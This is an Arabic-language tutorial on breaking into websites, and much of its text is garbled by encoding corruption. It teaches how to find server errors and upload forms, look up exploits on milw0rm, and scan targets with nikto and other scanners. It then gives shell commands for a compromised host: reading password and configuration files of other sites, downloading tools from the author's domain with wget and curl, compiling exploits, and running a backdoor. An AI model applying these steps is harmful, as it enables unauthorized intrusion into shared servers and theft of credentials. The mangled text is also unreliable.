‫‪٘ٚ‬مٖ اٌٍغاخ ِٓ أُ٘ اٌٍغاخ اٌّ‪ٛ‬ظ‪ٛ‬قج ؼاٌ‪١‬اً ت‪ ٓ١‬اٌّثهِع‪ٚ ٓ١‬ذع‪ٛ‬ق‬

‫ٌغاخ أـه‪ٚ ٜ‬وص‪١‬هج ٌىٓ لّد تعّغ أفؼً اٌٍغاخ اٌشائؼح‬

‫ِارا ‪٠‬مصذ باألخطاء اٌبشِج‪١‬ت‬

 ‫‪ :.‬األــاء اٌثهِع‪١‬ح ‪.:‬‬
‫٘‪ٛ‬ا ــاء ‪٠‬ظكن ػاقذاً ِٓ ِك‪٠‬ه اٌّ‪ٛ‬لغ ِصً اٌرؼك‪ ً٠‬ػٍ‪ ٝ‬اٌٍىهتراخ‬
‫أ‪ٚ‬ذؼك‪ٍِ ً٠‬ف تئِركاق ‪ٕ٠ٚ php‬رط ٘ما اٌفـاء‪,‬ػٕك ذظفؽه ٌّ‪ٛ‬لغ ِؼ‪ٓ١‬‬
‫ا‪ِٕ ٚ‬رك‪ٌٛ ٜ‬ف ذالؼظ ‪ٚ‬ظ‪ٛ‬ق ــاء وّا ف‪ ٟ‬اٌشىً اٌراٌ‪ٟ‬‬

‫الؼظ ‪٠‬رى‪ٍِ ِٓ ْٛ‬ان ‪٘ٚ‬ما اٌٍّان ‪٠‬كٌٕا ػٓ ِىاْ اٌفـاء‬

‫‪Home/aqaedcom/public_html/shia_news/detail‬‬
‫ٌ‪ٛ‬ف أل‪ َٛ‬تشهغ أظىاء اٌفـاء اٌراٌ‪ٟ‬‬
‫‪home‬‬
‫ا‪ٚ‬ي ِعٍك ٍٔرٕرط أٗ ‪٠‬مغ ف‪ِ ٗ١‬عٍكاخ ‪ٍِٚ‬فاخ اٌّ‪ٛ‬الغ اٌر‪ ٟ‬ػٍ‪ٔ ٝ‬فً اٌٍ‪١‬هفه‬

‫‪aqaedcom‬‬
‫اِا اٌّعٍك اٌراٌ‪ٛ٘ٚ ٟ‬ا ‪ٛ٠‬ون اٌّ‪ٛ‬لغ ‪ٚ‬تئِىإٔا اٌرفّ‪ ٓ١‬إٌ‪ ٝ‬اْ ٔظً إٌ‪ٌٛ ٝ‬ؼح‬
‫اٌرؽىُ ٌ‪ ٟ‬تًٕ‬

‫‪public_html‬‬
‫اِا اٌّعٍك اٌراٌ‪ٛ٘ٚ ٟ‬ا ‪٠‬ؽر‪ ٜٛ‬ػٍ‪ ٝ‬ظّ‪١‬غ ٍِفاخ اٌّ‪ٛ‬لغ ِٓ ٌىهتراخ ‪ِٚ‬ا إٌ‪ٝ‬‬
‫لاٌه‬
 ‫اٌفصً اٌثأ‪ٟ‬‬

‫اٌبسث عٓ األخطاء ‪find in errors‬‬

‫اٌبسث عٓ ثغزاث اٌظىزبخاث ‪find sicrepts‬‬
‫إظ‪ٙ‬ار وافت اٌّعٍ‪ِٛ‬اث ‪ٚ‬اٌثغزاث باٌّ‪ٛ‬لع بظخخذاَ أداة ‪nikto‬‬
‫ِظر اٌّ‪ٛ‬الع بظخخذاَ بزٔاِح ‪Shadow Security Scanner‬‬
‫أطخخزاج ِدٍذاث اٌّ‪ٛ‬لع اٌّظخ‪ٙ‬ذف عبز بزٔاِح ‪Intelli tamper‬‬
 ‫‪ :.‬البحث عن األخطاء ‪.:‬‬
‫‪Find in errors‬‬
‫ؿه‪٠‬مح اٌثؽس ػٓ االــاء ذؼرّك ػٍ‪١‬ه ف‪ ٟ‬اٌثؽس ػٓ اٌٍ‪١‬هفه‬
‫تك‪٠‬راً ٔم‪ َٛ‬تئٌرفهاض ‪ ip‬اٌّ‪ٛ‬لغ ٔم‪ َٛ‬تاٌم٘اب إٌ‪ٝ‬‬
‫‪ Start‬شُ اٌم٘اب إٌ‪ run ٝ‬شُ ٔم‪ َٛ‬ت‪ٛ‬ػغ األِه ‪ command‬ا‪ٚ‬‬
‫‪ cmd‬شُ ذفهض ٌٕا شاشح اٌك‪ٚ‬ي أ‪ِٛ ٚ‬ظح اٌك‪ٚ‬ي ٔم‪ َٛ‬ت‪ٛ‬ػغ األِه‬
‫اٌراٌ‪ping fawazhack ٟ‬‬
‫ِغ اٌؼٍُ اْ ‪ fawazhack‬ناتؾ اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف‬
‫ػٕك ‪ٚ‬ػغ ٘ما األِه الؼظ ‪ٚ‬ظ‪ٛ‬ق ‪ip‬‬
‫‪٘ٚ‬ما ‪ ip‬ـاص تاٌٍ‪١‬هفه ‪ٚ‬اٌ‪ٙ‬كف ِٓ لاٌه ٌفؽض اٌّ‪ٛ‬لغ ػثه اٌـه‪٠‬مح‬
‫اٌراٌ‪ٗ١‬‬
‫لُ تٍٕؿ ‪ ip‬اٌّ‪ٛ‬ظ‪ٛ‬ق تّ‪ٛ‬ظح األ‪ٚ‬اِه‬
‫أل٘ة إٌ‪ ٝ‬إؼكا اٌّ‪ٛ‬الغ اٌرـاٌ‪١‬ـٗ‬
‫‪www.msn.com or www.bing.com‬‬

‫شُ لُ ت‪ٛ‬ػغ وٍّح ‪ِ ip:‬غ إٌمـراْ‬

‫ٌ‪١‬ظثػ ٘ىما‬
‫‪ip:123:123:123‬‬
‫ِغ اٌؼٍُ أْ ‪ ip 123:123:123‬اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف‬
 ‫الؼظ إٔٔا لّٕا تئٌرفهاض ِ‪ٛ‬الغ اٌر‪ ٟ‬ػٍ‪ٔ ٝ‬فً اٌٍ‪١‬هفه ٘مٖ اٌّ‪ٛ‬الغ‬
‫ظّ‪١‬ؼ‪ٙ‬ا ػٍ‪١ٌ ٝ‬هفه ‪ٚ‬اؼك ٔم‪ َٛ‬ا‪ ْ٢‬تىراتح تؼغ األــاء ٌٍؽظ‪ٛ‬ي ػٍ‪ٝ‬‬
‫ــاء ِؼ‪ٚ ٓ١‬أٌرغالٌٗ‬

‫‪##################Errors##################‬‬
‫‪#‬‬ ‫‪error‬‬ ‫‪#‬‬
‫‪#‬‬ ‫‪public_html‬‬ ‫‪#‬‬
‫‪#‬‬ ‫‪mysql‬‬ ‫‪#‬‬
‫‪#‬‬ ‫‪warning‬‬ ‫‪#‬‬
‫‪##################Errors##################‬‬

‫أ‪ ٚ‬اٌثؽس ػٓ ِهاوى ذؽّ‪ٔٚ ً١‬م‪ َٛ‬تاٌرؽا‪ ً٠‬ػٍ‪ٙ١‬ا وّا لوهٔا ٌاتماً ؿه‪٠‬مح‬
‫اٌرؽا‪ً٠‬‬
‫‪Upload‬‬
‫أ‪ٔ ٚ‬م‪ َٛ‬تىراتح تاٌؼهت‪١‬ح‬
‫ِهوى ذؽّ‪ً١‬‬
 .: ‫ البحث عن ثغراث السكربتاث‬:.
‫َ تاٌثؽس ػٓ شغهاخ ِٕاٌثٗ ٌٍىهتراخ‬ٛ‫ف ٔم‬ٌٛ ‫مح‬٠‫ ٘مٖ اٌـه‬ٟ‫ف‬
ً‫نج ِص‬ٛٙ‫ِش‬
Wordpress IP.Board
Phpld phpbb
Joomla Infinity
php-fusion vBulletin
ibd smf
WHMCS XMB
smart Burning Board4
Almnzm Arab Portal
Discuz! 6.0 W eb2.0
Flash Chat IP.Board
coppermine 4images
‫هفه‬١ٌٍ‫ ا‬ip ‫ا تؼك‬ٙ‫ػؼ‬ٚٚ bing ‫لغ‬ِٛ ٟ‫تؼك اٌثؽس ػٓ ٘مٖ اٌٍىهتراخ ف‬
‫الغ‬ٌّٛ‫لك لوهٔا ِصً ٘مٖ ا‬ٚ ‫الغ اٌصغهاخ‬ِٛ ٜ‫ إؼك‬ٌٝ‫َ تاٌم٘اب إ‬ٛ‫ٔم‬

http://www.milw0rm.com
 ‫شُ ٔم‪ َٛ‬تاٌر‪ٛ‬ظٗ إٌ‪ ٝ‬ـأح اٌثؽس‬
‫‪http://www.milw0rm.com/search.php‬‬
‫‪ٔٚ‬ؼغ أٌُ اٌٍىهتد اٌم‪ٚ ٞ‬ظكٔاٖ ف‪ ٟ‬اٌٍ‪١‬هفه ‪ٔٚ‬م‪ َٛ‬تإٌظه إٌ‪ ٝ‬شغهاذٗ‬
‫‪ٚ‬ذـث‪١‬م‪ٙ‬ا ؼر‪ ٝ‬اٌ‪ٛ‬ط‪ٛ‬ي إٌ‪ٔ ٝ‬ر‪١‬عح‬
 ‫‪ :.‬إظهار كافت الوعلىهاث والثغراث بالوىقع ‪.:‬‬
‫بستخذام أداة ‪nikto‬‬
‫‪ٚ‬ظ‪١‬فح ٘مٖ األقاٖ ‪ :‬تا‪ ِٓ ٓ٠‬اٌؼٕ‪ٛ‬اْ إظ‪ٙ‬ان ِؼٍ‪ِٛ‬اخ اٌّ‪ٛ‬لغ ‪ٚ‬اٌصغهاخ‬
‫‪ٛ٘ٚ‬ا ِثهِط تٍغح اٌث‪١‬هي فٍماٌه ٔؽراض ِرهض ٌغح اٌث‪١‬هي ‪perl‬‬
‫ٔم‪ َٛ‬ترؽّ‪ ً١‬األقاٖ ِٓ ٕ٘ا‬
‫‪/http://cirt.net/nikto/UPDATES‬‬
‫ِغ اٌؼٍُ اْ ٘ما اٌّ‪ٛ‬لغ ‪ٙ٠‬رُ تاألقاٖ ‪٠ٚ‬م‪ َٛ‬وً ِكٖ ِؼ‪ ٕٗ١‬ترؽك‪٠‬س ‪ٚ‬إػافح‬
‫شغهاخ ظك‪٠‬كج ٌألقاٖ لُ ترؽّ‪ ً١‬أـه إطكان ٌ‪ٙ‬مٖ األقاٖ ِٓ اٌّ‪ٛ‬لغ اٌراٌ‪ٟ‬‬
‫تؼك ذؽّ‪ ً١‬األقاٖ ٔم‪ َٛ‬ت‪ٛ‬ػؼ‪ٙ‬ا ف‪ِ ٟ‬عٍك ٌغح اٌث‪١‬هي ِصً األِركاق اٌراٌ‪ٟ‬‬
‫‪C:/perl/bin/nikto‬‬
‫ؿه‪٠‬مح ذشغ‪ ً١‬االقاٖ‬
‫ٔم‪ َٛ‬تاٌم٘اب إٌ‪ِٛ ٝ‬ظح اٌك‪ٚ‬ي شُ ٔؼغ األِه اٌراٌ‪ٟ‬‬
‫\‪Cd‬‬
‫شُ األِه االـه‬
‫‪Cd perl/bin‬‬
‫شُ‬
‫‪Cd perl/bin/nikto‬‬
‫شُ ؿه‪٠‬مح اٌرشغ‪ ً١‬أ‪ٚ‬الً ٔم‪ َٛ‬ت‪ٛ‬ػغ االِه‬
‫‪Perl nikto.pl‬‬
‫٘ما األِه ‪ٚ‬ػ‪١‬فرٗ ‪٠‬م‪ َٛ‬تاظ‪ٙ‬ان ـ‪١‬اناخ األقاٖ‬
 ‫‪ٚ‬الوٓ ِا‪ّٕٙ٠‬ا ِٓ ت‪٘ ٓ١‬مٖ األ‪ٚ‬اِه أِه‬
‫‪-host‬‬
‫األْ ٔم‪ َٛ‬ت‪ٛ‬ػغ األِه واِالً‬
‫‪Perl nikto.pl –host www.fawazhack.com‬‬
‫تؼك ‪ٚ‬ػغ األِه اٌراٌ‪ٌٛ ٟ‬ف ذه‪ ٜ‬أٗ لاَ تاظ‪ٙ‬ان ٔ‪ٛ‬ع ٔظاَ اٌرشغ‪ ً١‬أ‪٠‬ؼاً‬
‫اطكانٖ ‪ِٚ‬ؼٍ‪ِٛ‬اخ ؼ‪ٛ‬ي اٌك‪ ٞ‬اْ اي ‪ِٚ dns‬ؼٍ‪ِٛ‬اخ اـه‪ِّٗٙ ٜ‬‬
‫‪ٚ‬إظ‪ٙ‬ان اٌصغهاخ تاٌّ‪ٛ‬لغ‬
 ‫‪ :.‬هسح الوىاقع بستخذام برناهح ‪.:‬‬
‫‪Shadow Security Scanner‬‬
‫أ‪ٚ‬الً ‪ٚ‬ظ‪١‬فح ٘ما اٌثهٔاِط ‪٠‬م‪ َٛ‬تٍّػ اٌّ‪ٛ‬لغ ‪ٚ‬إظ‪ٙ‬ان اٌصغهاخ ‪ٚ‬األِاوٓ‬
‫اٌؽٍاٌح ف‪ ٟ‬اٌّ‪ٛ‬لغ أ‪ٔ ٚ‬ماؽ اٌؼؼف تؼك ذصث‪١‬د اٌثهٔاِط‬

‫ٔم‪ َٛ‬تاٌؼغؾ ػٍ‪New session ٝ‬‬

‫ٌ‪ٛ‬ف ذأذ‪ ٟ‬اٌشاشح اٌراٌ‪١‬ح‬
‫ٔم‪ َٛ‬تاٌؼغؾ ػٍ‪next ٝ‬‬
 ‫شُ ‪add host‬‬

‫ف‪٘ ٟ‬مٖ اٌشاشح ٔم‪ َٛ‬تئػافح أِاَ ‪name or ip:‬‬

‫ناتؾ اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف أ‪ ٚ‬إ‪٠‬ث‪ ٟ‬اٌٍ‪١‬هفه‬

‫‪ٔٚ‬م‪ َٛ‬تؼك إػافح اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف ٔم‪ َٛ‬تاٌؼغؾ ػٍ‪add ٝ‬‬
‫تؼك إػافح ناتؾ اٌّ‪ٛ‬لغ الؼظ اٌظ‪ٛ‬نج اٌراٌ‪١‬ح‬
‫الؼظ ف‪ ٟ‬لائّح ‪ٛ٠ host‬ظك اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف تؼك لاٌه ‪next‬‬
 ‫تؼك لاٌه ٔم‪ َٛ‬تاٌؼغؾ ػٍ‪start scan ٝ‬‬
‫‪ٌٛٚ‬ف ‪٠‬م‪ َٛ‬اٌثهٔاِط تٍّػ اٌّ‪ٛ‬لغ ‪ٚ‬إلا واْ ف‪ ٟ‬اٌّ‪ٛ‬لغ شغهاخ ٌ‪ٛ‬ف‬
‫ذأذ‪ ٟ‬ػٍ‪ ٝ‬اٌشّاي ِٓ اٌظ‪ٛ‬نج األـ‪١‬هج ف‪ ٟ‬اٌفأح اٌ‪ٍ١‬هٖ‬
 ‫‪ :.‬أستخراج هدلذاث الوىقع الوستهذف ‪.:‬‬
‫عبز بزٔاِح ‪Intelli tamper‬‬
‫اٌفائكج ِٓ ٘مٖ اٌـه‪٠‬مح ٔم‪ َٛ‬تئٌرفهاض ِعٍكاخ اٌّ‪ٛ‬لغ ‪ٚ‬اٌٍىهتراخ‬
‫اٌّهوثح ػٍ‪٘ ٝ‬ما اٌّ‪ٛ‬لغ ٔم‪ َٛ‬ترؽّ‪ ً١‬أ‪٠‬ؼاً اٌٍّفاخ اٌر‪ ٟ‬ذٕر‪ ٟٙ‬تئِركاق‬
‫ٌغح اٌثهِعح ‪ php‬شُ ٔم‪ َٛ‬ترؽّ‪ٍٙ١‬ا ‪ٚ‬فؽظ‪ٙ‬ا تأٌرفكاَ تهٔاِط‬
‫‪ٚ notepad++‬اٌثؽس ػٓ شغهاخ تؼك اٌّرغ‪١‬هاخ ‪$‬‬
 ‫اٌفظـً اٌصاٌس‬

‫اٌخفز‪٠‬ك ب‪ ٓ١‬أ‪ٚ‬اِز ‪linunx and win xp‬‬

‫األ‪ٚ‬اِز اٌّظخخذِت ف‪ ٟ‬اٌشً ‪command in shell‬‬

‫_أ‪ٚ‬اِز اٌضغط ‪ٚ‬فه اٌضغط‬

‫_أ‪ٚ‬اِز اٌّخخزق اٌذاخٍ‪١‬ت‬
‫_أ‪ٚ‬اِز اٌّخخزق اٌخارخ‪١‬ت‬
‫اٌصالز‪١‬اث‬
‫شزذ اٌصالز‪١‬اث‬
‫اٌخصار‪٠‬ر ‪Permissions‬‬
‫_أشىاي اٌخصار‪٠‬ر‬
‫_اٌخفز‪٠‬ك ب‪ ٓ١‬اٌّدٍذ ‪ٚ‬اٌٍّف‬
‫حخط‪ ٟ‬اٌظ‪١‬ف ِ‪ٛ‬د ‪Safe_mode: ON‬‬
‫لزاءة اٌٍّفاث بصالز‪١‬ت ‪ٛ٠‬سر ‪user‬‬
‫االحصاي باٌظ‪١‬زفز عٓ طز‪٠‬ك اٌباوذ‪ٚ‬ر ‪connect backdoor‬‬
‫‪ :.‬اٌخفش‪٠‬ك ب‪ ٓ١‬أ‪ٚ‬اِش ‪.: Linux and Win xp‬‬
‫ف‪ ٟ‬اٌجذ‪ٚ‬ي اٌخاٌ‪ ٟ‬بعط أ‪ٚ‬اِش وً ِٓ اٌٍ‪ٕ١‬ىظ ‪ٚ‬االوظ ب‪ٟ‬‬
‫اٌج‪ٙ‬ت اٌ‪ ّٕٝ١‬ا‪ٚ‬اِش ‪linux‬‬

‫اِا اٌج‪ٙ‬ت اٌ‪١‬غش‪ ٜ‬أ‪ٚ‬اِش ‪xp‬‬

‫‪Xp‬‬ ‫‪Linux‬‬

‫ٔىرف‪ ٟ‬ت‪ٙ‬ما اٌعك‪ٚ‬ي ِٓ أ‪ٚ‬اِه وً ِٓ اٌٍ‪ٕ١‬ىً ‪ٚ‬االوً ت‪٘ٚ ٟ‬مٖ األ‪ٚ‬اِه‬

‫اٌٍّرفكِح ف‪ ٟ‬وال ِٓ إٌظاِ‪ٚ ٓ١‬األ‪ٚ‬اِه وص‪١‬هج الوٓ ٘مٖ األ‪ٚ‬اِه‬
‫أألٌاٌ‪١‬ح ف‪ ٟ‬إٌظاِ‪ٓ١‬‬
 ‫‪ :.‬األ‪ٚ‬اِش اٌّغخخذِٗ ف‪ ٟ‬اٌشً‪.:‬‬
‫‪Linux‬‬

‫أِا األ‪ٚ‬اِه اٌٍّرفكَ ف‪ ٟ‬اٌشً ػٍ‪ ٝ‬ؼٍة اٌٍ‪١‬هفه إِا اٌٍ‪ٕ١‬ىً أ‪ ٚ‬أوً‬
‫ت‪ ٟ‬اٌؼاقج ‪٠‬ى‪ ْٛ‬اٌٍ‪١‬هفه ٔظاَ ٌ‪١ٕ١‬ىً ‪ٌٚ‬ماٌه ٌ‪ٛ‬ف أل‪ َٛ‬تشهغ أ‪ٚ‬اِه‬
‫اٌٍ‪ٕ١‬ىً‬
‫أواهر اللينكس تقسن إلى ثالثت أقسام هنها‬

‫_أواهر الضغط وفك الضغط‬

‫_أواهر الهكر الذاخليت‬
‫_أواهر الهكر الخارخيت‬
 .:ً‫ اٌش‬ٟ‫اِش اٌّغخخذِٗ ف‬ٚ‫ األ‬:.
Linux
‫فـه اٌعغط‬ٚ ‫اِش اٌعغط‬ٚ‫أ‬
‫ا‬ِٙ‫ أعخخذا‬ٟ‫ ٌغشض ِاء ف‬ٚ‫شفش أ‬١‫ت اٌغ‬٠‫ حّا‬ٟ‫ حخط‬ٟ‫اِش ف‬ٚ‫ذ ٘زٖ األ‬١‫بشىً ِخخصش حف‬

‫فه اٌضغط‬ٚ ‫اِز اٌضغط‬ٚ‫أ‬

‫ر‬١‫ض‬ٛ‫ األِز ٌٍخ‬ٍٝ‫ِثاي ع‬ ً‫األِز وخابخا‬ ‫فت األِز‬١‫ظ‬ٚ

qzip failname qzip zip ‫أِز اٌضغط باِخذاد‬

unzip failname unzip zip ‫اِز فه اٌضغط باِخذاد‬

tar -zcf zz.tar daily tar -zcf tar ‫أِز اٌضغط باِخذاد‬

tar -zxf zz.tar tar -zxf tar ‫أِز فه اٌضغط باِخذاد‬

tar -czvf file name.tar.gz file name.sql tar -czvf gz ‫أِز ضغط اٌٍّف باِخذا‬

gzip -d file.gz gzip -d gz ‫فه اٌضغط باِخذاد‬

tar -czvf file name.tar.gz file name.sql tar -czvf ‫أاث‬١‫ت ضغط لاعذة اٌب‬١‫ف‬١‫و‬

tar -zxvf file name.tar.gz tar -zxvf ‫أاث‬١‫اعذ اٌب‬ٛ‫ت فه ل‬١‫ف‬١‫و‬

tar -czvf /home/fawazhack/public_html/n3.tar.gz n3 tar -czvf

tar.gz ‫اٌّدٍذاث باِخذاد اِز ضغط‬
 ‫‪ :.‬األ‪ٚ‬اِش اٌّغخخذِٗ ف‪ ٟ‬اٌشً‪.:‬‬
‫‪Linux‬‬

‫أ‪ٚ‬اِش اٌّخخشق اٌذاخٍ‪١‬ت‬

‫ٕ٘ا ٔمف لٍ‪١‬الُ ‪ٔٚ‬خأًِ ف‪ ٟ‬وٍّج اٌذاخٍ‪١‬ت ‪ٔٚ‬ف‪٘ ِٓ ُٙ‬ذٖ اٌىٍّت أْ األ‪ٚ‬اِز‬
‫اٌّظخخذِت ف‪ ٟ‬اٌدذ‪ٚ‬ي أدٔاٖ حف‪١‬ذ ف‪ ٟ‬اخخزاق اٌّ‪ٛ‬لع اٌذ‪ِ ٞ‬زف‪ٛ‬ع عٍ‪ ٗ١‬اٌشً‬
‫أ‪ِ ٚ‬دٍذ اٌّ‪ٛ‬لع‬
‫أ‪ٚ‬اِز اٌّخخزق اٌذاخٍ‪١‬ت‬

‫ِثاي عٍ‪ ٝ‬األِز ٌٍخ‪ٛ‬ض‪١‬ر‬ ‫األِز وخابخاً‬ ‫‪ٚ‬ظ‪١‬فت األِز‬

‫‪Ls‬‬ ‫‪Ls‬‬ ‫اطخعزاض اٌٍّفاث‬

‫اطخعزاض اٌٍّفاث ‪ٚ‬اٌّدٍذاث اٌّخف‪١‬ت‬

‫‪Ls‬‬ ‫‪ls –la‬‬
‫‪ٚ‬اٌخصار‪٠‬ر‬

‫‪Pwd‬‬ ‫‪Pwd‬‬ ‫حسذ‪٠‬ذ اٌّىاْ عٍ‪ٜ‬اٌظ‪١‬زفز‬

‫‪ls;pwd‬‬ ‫;‬ ‫اداة اٌزبط ب‪ ٓ١‬األ‪ٚ‬اِز‬

‫‪Wget‬‬ ‫أِزاٌظسب‬
‫*‪wget http://www.fawazhack.com/ll.zip;ls ll‬‬
‫*‪curl -o ./ll.zip http://www.fawazhack.com/ll.zip;ls ll‬‬ ‫‪curl -o ./‬‬ ‫اِز اٌظسب ا‪٢‬خز‬

‫‪History‬‬ ‫‪History‬‬ ‫أِز ِعزفت خّ‪١‬ع األ‪ٚ‬اِز اٌخ‪ٔ ٟ‬فذث باٌشً‬

‫‪mkdir alkasr‬‬ ‫‪Mkdir‬‬ ‫أشاء ِدٍذ خذ‪٠‬ذ‬

‫‪rm failname‬‬ ‫‪Rm‬‬ ‫أِز اٌسذف‬

‫‪rm -r dir‬‬ ‫‪rm –r‬‬ ‫زذف ِدٍذ بدّ‪١‬ع اٌٍّفاث‬

‫‪edit failname‬‬ ‫‪Edit‬‬ ‫أِز اٌخعذ‪ً٠‬‬

‫‪Who‬‬ ‫‪Who‬‬ ‫اِز اٌخصٍ‪ ٓ١‬عٍ‪ ٝ‬اٌظ‪١‬زفز‬

‫‪Cd‬‬ ‫‪Cd‬‬ ‫اِز دخ‪ٛ‬ي اٌّدٍذاث‬

 ‫‪cd ..‬‬ ‫‪cd ..‬‬ ‫اِز اٌع‪ٛ‬دة ٌٍخٍف‬

‫‪Mv‬‬ ‫‪Mv‬‬ ‫اِز اعادة اٌخظّ‪١‬ت‬

‫‪Find‬‬ ‫‪Find‬‬ ‫اِز اٌبسث‬

‫‪/.‬‬ ‫‪/.‬‬ ‫أِز حشغ‪ ً١‬اٌبان د‪ٚ‬ر‬

‫‪uname –a‬‬ ‫‪uname -a‬‬ ‫أِز ِعزفت اصذار اٌظ‪١‬زفز‬

‫*‪ls ftp.zip‬‬ ‫*‬ ‫اِز ‪٠‬زِ‪ٌٍ ٛ‬ىً‬

‫‪man ls‬‬ ‫‪man‬‬ ‫اِز اٌّظاعذة‬

‫‪drwxrwxrwx‬‬ ‫‪chmod 777 dd‬‬ ‫‪chmod‬‬ ‫أِز إعطاء اٌخصز‪٠‬ر‬

‫‪touch alkasr.php‬‬ ‫‪touch‬‬ ‫أِز أشاء ٍِف فارغ‬

‫‪gcc alkaser.c -o fawazhack‬‬

‫‪Gcc‬‬ ‫حزخّت اٌى‪ِٛ‬با‪ ً٠‬ا‪ ٚ‬االوظبٍ‪٠ٛ‬ج‬
‫‪٠‬بذأ اٌى‪ٛ‬د ب‪ٙ‬ذٖ اٌىٍت ‪usr/bin/perl‬‬ ‫ال ‪٠‬سسخاج حزخّت‬ ‫ٍِفاث اٌب‪١‬زي حبذأ بــ‬
‫‪٠‬بذأ اٌى‪ٛ‬د ب‪ٙ‬ذٖ اٌىٍت ‪include‬‬ ‫ترجمة وتشغيل فقط‬ ‫ٍِفاث اٌظ‪ ٟ‬حبذأ بــ‬
 .:ً‫ اٌش‬ٟ‫اِش اٌّغخخذِٗ ف‬ٚ‫ األ‬:.
Linux

‫ت‬١ٍ‫اِش اٌّخخشق اٌذاخ‬ٚ‫أ‬

‫ عزض‬ٜ‫الغ األـه‬ٌّٛ‫لهاءج ا‬ٚ ‫اٌٍؽة‬ٚ ً‫ اٌرٕم‬ٟ‫كٔا ف‬١‫اِه ذف‬ٚ‫ ٘مٖ األ‬ٟ‫ف‬
.‫زفز‬١‫ اٌظ‬ٍٝ‫ ع‬ٟ‫الع اٌخ‬ٌّٛ‫ع ا‬١ّ‫خ‬

‫ت‬١‫ىز اٌخارخ‬ٌٙ‫اِز ا‬ٚ‫أ‬

‫ر‬١‫ض‬ٛ‫ األِز ٌٍخ‬ٍٝ‫ِثاي ع‬ ً‫األِز وخابخا‬ ‫فت األِز‬١‫ظ‬ٚ

cat /home/*/public_html/_vti_pvt/access.cnf cat ‫زفز‬١‫ اٌظ‬ٍٝ‫ ع‬ٟ‫الع اٌخ‬ٌّٛ‫ع ا‬١ّ‫عزض خ‬

cat /home/*/public_html/_vti_pvt/service.pwd cat ‫زفز‬١‫ اٌظ‬ٍٝ‫رداث ع‬ٚٛ‫ع اٌباط‬١ّ‫عزض خ‬

cat /usr/local/apache/conf/httpd.conf cat ‫زفز‬١‫ٌّعزفت عزض ِصذر اٌظ‬

find / -name httpd.conf find ‫عزض اٌّصذر‬

more /etc/userdomains more CAT ‫اِز ِشابت ٌألِز‬

pico /home/burst/public_html/index.html pico ‫ص‬ٛ‫ز إٌص‬٠‫حسز‬

ِٓ ‫ا ٌىٕٗ اصعب‬٠‫ز ِٓ اٌّشا‬١‫ز بٗ اٌىث‬٠‫اِز حسز‬

vi /home/burst/public_html/index.html vi
‫اٌظابك‬

valiases ‫ُ ٔؽكق‬ٌّٙ‫ا‬ ls -la /etc/valiases ls ‫ون‬ٛ١ٌ‫هفه ِغ ا‬١ٌٍ‫ ا‬ٍٝ‫ ػ‬ٌٍٟ‫الغ ا‬ٌّٛ‫ِؼهفح ا‬

ls /var/named ls ‫هفه‬١ٌٍ‫ ا‬ٍٝ‫ ػ‬ٌٍٟ‫الغ ا‬ٌّٛ‫غ ا‬١ّ‫ِؼهفح ظ‬

valiases ‫ُ ٔؽكق‬ٌّٙ‫ا‬ ls /usr/local/psa/home/vhosts/ ls ‫هفه‬١ٌٍ‫ ا‬ٍٝ‫الغ ػ‬ٌّٛ‫غ ا‬١ّ‫ِؼهفح ظ‬

perl fawazhack.pl perl ‫هي‬١‫ً اٌث‬١‫ذشغ‬

cat /etc/passwd ٓ‫ اتؽس ػ‬bash cat ً‫اِه اٌرفهاض ؼٍاتاخ اٌش‬

 ‫‪ :.‬اٌرظان‪٠‬ػ ‪.:‬‬
‫‪Permissions‬‬
‫اؼك ـظائض اٌٍّفاخ ‪ ٚ‬اٌّعٍكاخ اٌر‪٠ ٟ‬ؼؼ‪ٙ‬ا ِاٌه اٌّ‪ٛ‬لغ ا‪ ٚ‬اٌٍ‪١‬هفه‬
‫ػٍ‪ٍِ ٝ‬فاذٗ ٌؽّا‪٠‬رٗ ا‬
‫ػًّ اٌرهاـ‪١‬ض ‪٠‬ؼؼ‪ٙ‬ا ِك‪٠‬ه اٌٍ‪١‬هفه ػٍ‪ٍِ ٝ‬فاذٗ ٌٍؽّا‪ ٗ٠‬ػٕك ‪ٚ‬ط‪ٛ‬ي‬
‫أ‪ٍِ ٞ‬رفكَ اـه ٌ‪ٙ‬مٖ اٌٍّفاخ ال ‪ٍ٠‬رـ‪١‬غ األٌرفاقٖ ِٕ‪ٙ‬ا تشىً واًِ‬

‫اٌرظان‪٠‬ػ ذرى‪ ْٛ‬ػٍ‪ ٝ‬إٌؽ‪ ٛ‬اٌراٌ‪ٟ‬‬

‫ذظان‪٠‬ػ ذّىٕه ِٓ لهاءج ِؽر‪ ٜٛ‬اٌٍّف فمؾ ق‪ ْٚ‬أ‪ ٞ‬ذؼك‪ً٠‬‬

‫ذضن‪٠‬ػ ‪ّ٠‬ىٕه فؼً ِاذه‪٠‬ك ػٍ‪ ٝ‬اًٌّف ِصً‬

‫ا‬
‫لهاءج اٌٍّف ا‪ ٚ‬اٌرؼك‪ ً٠‬ػٍ‪ ٗ١‬ا‪ ٚ‬إٌٍؿ ا‪ ٚ‬ذشغ‪ ٍٗ١‬ا‪ٔ ٚ‬مً ا‪ ٚ‬ؼمف‬

‫‪ٚ‬ذظان‪٠‬ػ ذّٕؼه ِٓ فؼً اٌفاط‪١‬ر‪ ٓ١‬اٌٍاتمر‪ٓ١‬‬

‫‪ :.‬أشىاي اٌرظان‪٠‬ػ ‪.:‬‬
‫نلُ ِٓ شالز ـأاخ ‪ٛ٠ٚ‬ظك ٌىً ذظه‪٠‬ػ نِى ِؼ‪ ٓ١‬ال ‪٠‬رغ‪١‬ه‬

‫٘ما اؼك اٌرظان‪٠‬ػ‪: 777‬‬

‫نِىٖ ػٍ‪ ٝ‬اٌٍّفاخ ‪-rwxrwxrwx‬‬
‫نِىٖ ػٍ‪ ٝ‬اٌّعٍكاخ ‪drwxrwxrwx‬‬
‫الؼظ اٌظ‪ٛ‬نج اٌراٌ‪ ٗ١‬ف‪ ٟ‬اٌشً ‪٠‬ؽًّ ذظان‪٠‬ػ ‪777‬‬

‫وّا ف‪ ٟ‬اٌشىً اٌراٌ‪ ٟ‬ف‪ ٟ‬اٌظ‪ٛ‬نٖ الؼظ اٌٍّفاخ ‪ٚ‬تعأث‪ٙ‬ا اٌرظان‪٠‬ػ‬

‫ِعٍك ‪ٍِ Hacker :‬ف ‪.fawazhack.php :‬‬
